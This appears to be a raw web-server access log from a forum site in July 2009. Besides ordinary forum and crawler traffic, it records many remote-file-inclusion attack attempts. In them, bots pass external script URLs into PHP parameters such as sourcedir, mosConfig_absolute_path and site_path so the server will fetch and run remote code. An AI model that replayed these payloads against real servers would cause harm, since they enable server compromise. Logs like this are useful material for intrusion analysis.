65.60.32.34 - - [04/Jul/2009:17:00:21 -0700] "POST /phpBB2/posting.php?sid=e75b527657eedaeb3177aa2e87baf289 HTTP/1.1" 200 13198 "http://www.webmaster-showcase.net/phpBB2/posting.php?mode=quote&p=6390&sid=834ee1fbaf3149b1b4928d05b09a36d6" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.webmaster-showcase.net"
77.221.130.19 - - [04/Jul/2009:17:00:52 -0700] "GET /yahoo/accesslogs.php//standard//3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.prismed.net/loaded61a/images/htaccess/hold?? HTTP/1.1" 200 6897 "-" "libwww-perl/5.805" "www.webmaster-showcase.net"
77.221.130.19 - - [04/Jul/2009:17:00:53 -0700] "GET /standard//3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.prismed.net/loaded61a/images/htaccess/hold?? HTTP/1.1" 404 606 "-" "libwww-perl/5.805" "www.webmaster-showcase.net"
77.221.130.19 - - [04/Jul/2009:17:00:53 -0700] "GET /yahoo//standard//3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.prismed.net/loaded61a/images/htaccess/hold?? HTTP/1.1" 404 613 "-" "libwww-perl/5.805" "www.webmaster-showcase.net"
208.109.21.238 - - [04/Jul/2009:17:01:24 -0700] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
174.133.173.194 - - [04/Jul/2009:17:01:33 -0700] "GET /phpBB2/posting.php?mode=quote&p=147855 HTTP/1.1" 200 55406 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; us; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6" "webmaster-showcase.net"
77.221.130.19 - - [04/Jul/2009:17:01:36 -0700] "GET /standard//3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.oalcs.org/school/pages/about/about?? HTTP/1.1" 404 606 "-" "libwww-perl/5.805" "www.webmaster-showcase.net"
174.133.173.194 - - [04/Jul/2009:17:01:36 -0700] "POST /phpBB2/posting.php?sid=089ba114de51e3583cfa1de75ab16168 HTTP/1.1" 200 12664 "http://webmaster-showcase.net/phpBB2/posting.php?mode=quote&p=147855" "Mozilla/5.0 (Windows; U; Windows NT 5.0; us; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6" "webmaster-showcase.net"
116.121.201.73 - - [04/Jul/2009:17:03:27 -0700] "GET /modules/errors.php?error=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 579 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
116.121.201.73 - - [04/Jul/2009:17:03:27 -0700] "GET /logs/showfile.php/access.log%20%20//modules/errors.php?error=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
116.121.201.73 - - [04/Jul/2009:17:03:27 -0700] "GET /logs//modules/errors.php?error=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 585 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
116.121.201.73 - - [04/Jul/2009:17:03:27 -0700] "GET /logs/showfile.php//modules/errors.php?error=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
116.121.201.73 - - [04/Jul/2009:17:03:50 -0700] "GET /modules/errors.php?error=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 579 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
116.121.201.73 - - [04/Jul/2009:17:03:50 -0700] "GET /logs/showfile.php/access.log%20%20//modules/errors.php?error=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
116.121.201.73 - - [04/Jul/2009:17:03:51 -0700] "GET /logs/showfile.php/access_090523.log%20%20//modules/errors.php?error=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
174.133.173.194 - - [04/Jul/2009:17:03:51 -0700] "GET /phpBB2/posting.php?mode=quote&p=147850 HTTP/1.1" 200 55397 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; us; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6" "webmaster-showcase.net"
116.121.201.73 - - [04/Jul/2009:17:03:51 -0700] "GET /logs//modules/errors.php?error=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 585 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
116.121.201.73 - - [04/Jul/2009:17:03:51 -0700] "GET /logs/showfile.php//modules/errors.php?error=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
67.208.139.72 - - [04/Jul/2009:17:03:54 -0700] "GET /logs/showfile.php/access.log%20%20//include/admin.lib.inc.php?site_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
67.208.139.72 - - [04/Jul/2009:17:03:55 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 592 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
67.208.139.72 - - [04/Jul/2009:17:03:55 -0700] "GET /include/admin.lib.inc.php?site_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 599 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
67.208.139.72 - - [04/Jul/2009:17:03:55 -0700] "GET /logs/showfile.php//include/admin.lib.inc.php?site_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
174.133.173.194 - - [04/Jul/2009:17:03:55 -0700] "POST /phpBB2/posting.php?sid=0b12e64414a7624ac86608fe96eb972f HTTP/1.1" 200 12657 "http://webmaster-showcase.net/phpBB2/posting.php?mode=quote&p=147850" "Mozilla/5.0 (Windows; U; Windows NT 5.0; us; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6" "webmaster-showcase.net"
67.208.139.72 - - [04/Jul/2009:17:03:58 -0700] "GET /include/admin.lib.inc.php?site_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 599 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
67.208.139.72 - - [04/Jul/2009:17:03:58 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 592 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
67.208.139.72 - - [04/Jul/2009:17:03:58 -0700] "GET /logs/showfile.php/access.log%20%20//include/admin.lib.inc.php?site_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
67.208.139.72 - - [04/Jul/2009:17:03:58 -0700] "GET /logs/showfile.php//include/admin.lib.inc.php?site_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
67.208.139.72 - - [04/Jul/2009:17:04:15 -0700] "GET /logs/showfile.php/access_090615.log%20%20//include/admin.lib.inc.php?site_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
116.121.201.73 - - [04/Jul/2009:17:04:15 -0700] "GET /logs/showfile.php/access_090523.log%20%20//modules/errors.php?error=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
67.208.139.72 - - [04/Jul/2009:17:04:17 -0700] "GET /logs/showfile.php/access_090615.log%20%20//include/admin.lib.inc.php?site_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
71.135.59.3 - - [04/Jul/2009:17:04:40 -0700] "GET /gb/gbook.php?action=view&estart=99999 HTTP/1.0" 200 3902 "http://www.webmaster-showcase.net/gb/gbook.php?action=view&estart=99999" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 95; BCD2000)" "www.webmaster-showcase.net"
65.55.210.69 - - [04/Jul/2009:17:05:41 -0700] "GET /phpBB2/viewforum.php?f=2&topicdays=0&start=18500 HTTP/1.1" 200 73243 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.webmaster-showcase.net"
77.221.130.19 - - [04/Jul/2009:17:05:58 -0700] "GET /logs/showfile.php/access_090627.log//standard//3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.prismed.net/loaded61a/images/htaccess/hold?? HTTP/1.1" 200 1595 "-" "libwww-perl/5.805" "www.webmaster-showcase.net"
77.221.130.19 - - [04/Jul/2009:17:05:59 -0700] "GET /logs/showfile.php//standard//3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.prismed.net/loaded61a/images/htaccess/hold?? HTTP/1.1" 200 1595 "-" "libwww-perl/5.805" "www.webmaster-showcase.net"
69.20.70.31 - - [04/Jul/2009:17:06:42 -0700] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
96.31.68.140 - - [04/Jul/2009:17:07:18 -0700] "POST /phpBB2/posting.php?sid=92e01a5a856f18055d46020aa03c8238 HTTP/1.1" 200 13134 "http://www.webmaster-showcase.net/phpBB2/posting.php?mode=quote&p=6390&sid=834ee1fbaf3149b1b4928d05b09a36d6" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.webmaster-showcase.net"
67.208.139.72 - - [04/Jul/2009:17:08:00 -0700] "GET /logs/showfile.php/access.log//include/admin.lib.inc.php?site_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
67.208.139.72 - - [04/Jul/2009:17:08:02 -0700] "GET /logs/showfile.php/access.log//include/admin.lib.inc.php?site_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
67.208.139.72 - - [04/Jul/2009:17:08:04 -0700] "GET /logs/showfile.php/access_090615.log//include/admin.lib.inc.php?site_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
67.208.139.72 - - [04/Jul/2009:17:08:09 -0700] "GET /logs/showfile.php/access_090615.log//include/admin.lib.inc.php?site_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
174.133.173.194 - - [04/Jul/2009:17:08:12 -0700] "GET /phpBB2/posting.php?mode=reply&t=20617 HTTP/1.1" 200 55475 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; us; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6" "webmaster-showcase.net"
174.133.173.194 - - [04/Jul/2009:17:08:16 -0700] "POST /phpBB2/posting.php?sid=28e3d762b20c147321e7cdc758a8d56e HTTP/1.1" 200 12670 "http://webmaster-showcase.net/phpBB2/posting.php?mode=reply&t=20617" "Mozilla/5.0 (Windows; U; Windows NT 5.0; us; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6" "webmaster-showcase.net"
65.17.253.220 - - [04/Jul/2009:17:08:50 -0700] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
116.121.201.73 - - [04/Jul/2009:17:09:50 -0700] "GET /logs/showfile.php/access.log//modules/errors.php?error=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
174.133.173.194 - - [04/Jul/2009:17:09:53 -0700] "GET /phpBB2/posting.php?mode=quote&p=147862 HTTP/1.1" 200 53688 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; us; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6" "webmaster-showcase.net"
116.121.201.73 - - [04/Jul/2009:17:09:55 -0700] "GET /yahoo//modules/errors.php?error=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 582 "-" "Mozilla/5.0" "webmaster-showcase.net"
116.121.201.73 - - [04/Jul/2009:17:09:55 -0700] "GET /modules/errors.php?error=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 575 "-" "Mozilla/5.0" "webmaster-showcase.net"
174.133.173.194 - - [04/Jul/2009:17:09:57 -0700] "POST /phpBB2/posting.php?sid=46d2ce0379aa4f6dd050e37b96524b78 HTTP/1.1" 200 12640 "http://webmaster-showcase.net/phpBB2/posting.php?mode=quote&p=147862" "Mozilla/5.0 (Windows; U; Windows NT 5.0; us; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6" "webmaster-showcase.net"
116.121.201.73 - - [04/Jul/2009:17:09:59 -0700] "GET /logs/showfile.php/access.log//modules/errors.php?error=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
174.133.173.194 - - [04/Jul/2009:17:10:00 -0700] "GET /phpBB2/posting.php?mode=quote&p=95093 HTTP/1.1" 200 13260 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; us; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6" "webmaster-showcase.net"
209.235.254.107 - - [04/Jul/2009:17:10:03 -0700] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
116.121.201.73 - - [04/Jul/2009:17:10:12 -0700] "GET /yahoo//modules/errors.php?error=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 582 "-" "Mozilla/5.0" "webmaster-showcase.net"
116.121.201.73 - - [04/Jul/2009:17:10:12 -0700] "GET /modules/errors.php?error=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 575 "-" "Mozilla/5.0" "webmaster-showcase.net"
64.90.164.110 - - [04/Jul/2009:17:10:14 -0700] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
69.46.23.47 - - [04/Jul/2009:17:10:57 -0700] "POST /phpBB2/posting.php?sid=e71b27cb0ee5c22bc6672b27e0b3c669 HTTP/1.1" 200 13189 "http://www.webmaster-showcase.net/phpBB2/posting.php?mode=quote&p=6390&sid=834ee1fbaf3149b1b4928d05b09a36d6" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.webmaster-showcase.net"
66.232.97.145 - - [04/Jul/2009:17:11:04 -0700] "POST /phpBB2/posting.php?sid=94cb7a33e52bef2fb463a7f8d26245fb HTTP/1.1" 200 13242 "http://www.webmaster-showcase.net/phpBB2/posting.php?mode=quote&p=6390&sid=834ee1fbaf3149b1b4928d05b09a36d6" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.webmaster-showcase.net"
212.95.226.66 - - [04/Jul/2009:17:11:09 -0700] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
62.149.226.208 - - [04/Jul/2009:17:11:59 -0700] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
65.55.210.65 - - [04/Jul/2009:17:12:09 -0700] "GET /robots.txt HTTP/1.1" 404 567 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "webmaster-showcase.net"
65.55.210.65 - - [04/Jul/2009:17:12:10 -0700] "GET /phpBB2/posting.php?mode=topicreview&t=20617 HTTP/1.1" 200 30529 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "webmaster-showcase.net"
84.207.17.120 - - [04/Jul/2009:17:16:07 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 591 "-" "Mozilla/5.0" "webmaster-showcase.net"
84.207.17.120 - - [04/Jul/2009:17:16:07 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 596 "-" "Mozilla/5.0" "webmaster-showcase.net"
84.207.17.120 - - [04/Jul/2009:17:16:07 -0700] "GET /logs/showfile.php/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "webmaster-showcase.net"
84.207.17.120 - - [04/Jul/2009:17:16:07 -0700] "GET /logs/showfile.php/access_090617.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "webmaster-showcase.net"
84.207.17.120 - - [04/Jul/2009:17:16:22 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 591 "-" "Mozilla/5.0" "webmaster-showcase.net"
84.207.17.120 - - [04/Jul/2009:17:16:22 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 596 "-" "Mozilla/5.0" "webmaster-showcase.net"
84.207.17.120 - - [04/Jul/2009:17:16:22 -0700] "GET /logs/showfile.php/access_090617.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "webmaster-showcase.net"
84.207.17.120 - - [04/Jul/2009:17:16:23 -0700] "GET /logs/showfile.php/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "webmaster-showcase.net"
208.109.21.238 - - [04/Jul/2009:17:16:24 -0700] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
209.51.133.202 - - [04/Jul/2009:17:16:51 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 611 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
209.51.133.202 - - [04/Jul/2009:17:16:51 -0700] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 616 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
209.51.133.202 - - [04/Jul/2009:17:16:51 -0700] "GET /logs/showfile.php/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
209.51.133.202 - - [04/Jul/2009:17:16:51 -0700] "GET /logs/showfile.php/access_090627.log%20%20/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
209.51.133.202 - - [04/Jul/2009:17:16:55 -0700] "GET /logs/showfile.php/access_090523.log%20%20/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
174.133.173.194 - - [04/Jul/2009:17:17:24 -0700] "GET /phpBB2/posting.php?mode=quote&p=95121 HTTP/1.1" 200 56582 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; us; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6" "webmaster-showcase.net"
174.133.173.194 - - [04/Jul/2009:17:17:26 -0700] "POST /phpBB2/posting.php?sid=d94493ffe20c4f3a3ff77201882bf375 HTTP/1.1" 200 12661 "http://webmaster-showcase.net/phpBB2/posting.php?mode=quote&p=95121" "Mozilla/5.0 (Windows; U; Windows NT 5.0; us; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6" "webmaster-showcase.net"
84.207.17.120 - - [04/Jul/2009:17:17:41 -0700] "GET /logs/showfile.php/access.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "webmaster-showcase.net"
84.207.17.120 - - [04/Jul/2009:17:17:55 -0700] "GET /logs/showfile.php/access.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "webmaster-showcase.net"
190.144.44.36 - - [04/Jul/2009:17:19:57 -0700] "GET /index.php?sourcedir=http://www.drumzine.com/fx29id1.txt?? HTTP/1.1" 404 583 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
190.144.44.36 - - [04/Jul/2009:17:19:57 -0700] "GET /logs/showfile.php/access_090523.log/index.php?sourcedir=http://www.drumzine.com/fx29id1.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
190.144.44.36 - - [04/Jul/2009:17:19:57 -0700] "GET /logs/showfile.php/index.php?sourcedir=http://www.drumzine.com/fx29id1.txt?? HTTP/1.1" 200 3345 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
190.144.44.36 - - [04/Jul/2009:17:19:57 -0700] "GET /logs/index.php?sourcedir=http://www.drumzine.com/fx29id1.txt?? HTTP/1.1" 200 2252 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
174.133.173.194 - - [04/Jul/2009:17:21:19 -0700] "GET /phpBB2/posting.php?mode=quote&p=95162 HTTP/1.1" 200 55185 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; us; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6" "webmaster-showcase.net"
69.20.70.31 - - [04/Jul/2009:17:21:40 -0700] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
65.55.210.63 - - [04/Jul/2009:17:21:44 -0700] "GET /robots.txt HTTP/1.1" 404 571 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.webmaster-showcase.net"
65.55.210.63 - - [04/Jul/2009:17:21:45 -0700] "GET /phpBB2/posting.php?mode=quote&p=127089 HTTP/1.1" 200 77819 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.webmaster-showcase.net"
96.31.68.140 - - [04/Jul/2009:17:23:36 -0700] "POST /phpBB2/posting.php?sid=92e01a5a856f18055d46020aa03c8238 HTTP/1.1" 200 13143 "http://www.webmaster-showcase.net/phpBB2/posting.php?mode=quote&p=6390&sid=834ee1fbaf3149b1b4928d05b09a36d6" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.webmaster-showcase.net"
190.144.44.36 - - [04/Jul/2009:17:23:37 -0700] "GET /logs/showfile.php/access_090615.log/index.php?sourcedir=http://www.drumzine.com/fx29id1.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
65.55.109.195 - - [04/Jul/2009:17:23:39 -0700] "GET /phpBB2/posting.php?mode=quote&p=127089 HTTP/1.0" 200 77784 "http://search.live.com/results.aspx?q=copyrightdisclosure" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.webmaster-showcase.net"
65.55.109.195 - - [04/Jul/2009:17:23:47 -0700] "GET /phpBB2/templates/subSilver/formIE.css HTTP/1.0" 200 354 "http://www.webmaster-showcase.net/phpBB2/posting.php?mode=quote&p=127089" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.webmaster-showcase.net"
65.17.253.220 - - [04/Jul/2009:17:23:50 -0700] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
65.55.109.195 - - [04/Jul/2009:17:24:05 -0700] "GET /phpBB2/posting.php?mode=topicreview&t=28740&sid=854fbc421b0192e863000d8d5045e8fb HTTP/1.0" 200 48267 "http://www.webmaster-showcase.net/phpBB2/posting.php?mode=quote&p=127089" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.webmaster-showcase.net"
190.144.44.36 - - [04/Jul/2009:17:24:30 -0700] "GET /logs/showfile.php/access_090523.log%20%20/index.php?sourcedir=http://www.drumzine.com/fx29id1.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
84.207.17.120 - - [04/Jul/2009:17:24:44 -0700] "GET /logs/showfile.php/access_090617.log%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "webmaster-showcase.net"
84.207.17.120 - - [04/Jul/2009:17:24:54 -0700] "GET /logs/showfile.php/access_090617.log%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "webmaster-showcase.net"
209.235.254.107 - - [04/Jul/2009:17:25:03 -0700] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
84.207.17.120 - - [04/Jul/2009:17:25:13 -0700] "GET /logs/showfile.php/access.log%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "webmaster-showcase.net"
64.90.164.110 - - [04/Jul/2009:17:25:18 -0700] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
84.207.17.120 - - [04/Jul/2009:17:25:21 -0700] "GET /logs/showfile.php/access.log%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "webmaster-showcase.net"
66.232.97.145 - - [04/Jul/2009:17:26:08 -0700] "POST /phpBB2/posting.php?sid=94cb7a33e52bef2fb463a7f8d26245fb HTTP/1.1" 200 13244 "http://www.webmaster-showcase.net/phpBB2/posting.php?mode=quote&p=6390&sid=834ee1fbaf3149b1b4928d05b09a36d6" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.webmaster-showcase.net"
212.95.226.66 - - [04/Jul/2009:17:26:09 -0700] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
62.149.226.208 - - [04/Jul/2009:17:26:57 -0700] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
128.2.204.134 - - [04/Jul/2009:17:27:34 -0700] "GET /robots.txt HTTP/1.1" 404 571 "-" "PrivacyFinder/1.1" "www.webmaster-showcase.net"
128.2.204.134 - - [04/Jul/2009:17:27:35 -0700] "GET / HTTP/1.1" 200 686 "-" "PrivacyFinder/1.1" "www.webmaster-showcase.net"
128.2.204.134 - - [04/Jul/2009:17:27:35 -0700] "GET /robots.txt HTTP/1.1" 404 571 "-" "PrivacyFinder/1.1" "www.webmaster-showcase.net"
128.2.204.134 - - [04/Jul/2009:17:27:35 -0700] "GET /robots.txt HTTP/1.1" 404 571 "-" "PrivacyFinder/1.1" "www.webmaster-showcase.net"
69.46.23.47 - - [04/Jul/2009:17:28:08 -0700] "POST /phpBB2/posting.php?sid=e71b27cb0ee5c22bc6672b27e0b3c669 HTTP/1.1" 200 13190 "http://www.webmaster-showcase.net/phpBB2/posting.php?mode=quote&p=6390&sid=834ee1fbaf3149b1b4928d05b09a36d6" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.webmaster-showcase.net"
174.133.75.130 - - [04/Jul/2009:17:28:18 -0700] "GET /phpBB2/posting.php?mode=quote&p=114023&sid=9a71013b99c1f0e734c2259cec8b1e3c HTTP/1.1" 200 91790 "http://webmaster-showcase.net/phpBB2/viewtopic.php?t=20617&view=previous" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "webmaster-showcase.net"
174.133.75.130 - - [04/Jul/2009:17:28:24 -0700] "POST /phpBB2/posting.php?sid=b86fe3626b00a9e0cc1169702b625a74 HTTP/1.1" 200 13589 "http://webmaster-showcase.net/phpBB2/posting.php?mode=quote&p=114023&sid=9a71013b99c1f0e734c2259cec8b1e3c" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "webmaster-showcase.net"
